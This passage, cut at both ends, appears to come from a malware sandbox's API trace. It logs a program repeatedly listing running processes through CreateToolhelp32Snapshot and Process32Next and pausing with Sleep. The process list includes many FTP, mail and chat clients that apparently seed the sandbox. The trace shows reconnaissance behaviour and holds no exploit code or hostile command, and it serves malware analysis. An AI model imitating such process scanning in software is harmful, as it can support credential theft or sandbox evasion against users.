cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0178.415] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0178.417] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0178.418] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0178.420] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0178.422] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0178.424] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0178.426] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0178.427] Process32Next (in: hSnapshot=0xb3c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0178.429] CloseHandle (hObject=0xb3c) returned 1 [0178.429] Sleep (dwMilliseconds=0x64) [0178.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb38 [0178.600] Process32First (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.601] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0178.603] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0178.605] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0178.606] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0178.608] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0178.609] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0178.611] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0178.613] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0178.614] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.616] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.618] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0178.619] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.651] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.653] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.655] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.656] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.658] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.660] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.661] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0178.664] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0178.666] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0178.667] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0178.669] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.671] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0178.672] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0178.675] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0178.677] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0178.679] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0178.680] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0178.682] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.684] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.685] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0178.690] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0178.692] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0178.694] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0178.695] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0178.697] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0178.699] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0178.700] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0178.702] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0178.704] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0178.706] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0178.707] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0178.709] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0178.711] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0178.713] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0178.714] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0178.716] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0178.718] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0178.719] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0178.722] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0178.724] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0178.726] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0178.730] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0178.733] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0178.735] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0178.736] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0178.738] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0178.740] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0178.743] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0178.745] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0178.747] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0178.749] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0178.752] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0178.754] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0178.756] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0178.758] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0178.760] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0178.762] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0178.769] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0178.773] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0178.779] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0178.782] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0178.785] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0178.788] Process32Next (in: hSnapshot=0xb38, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 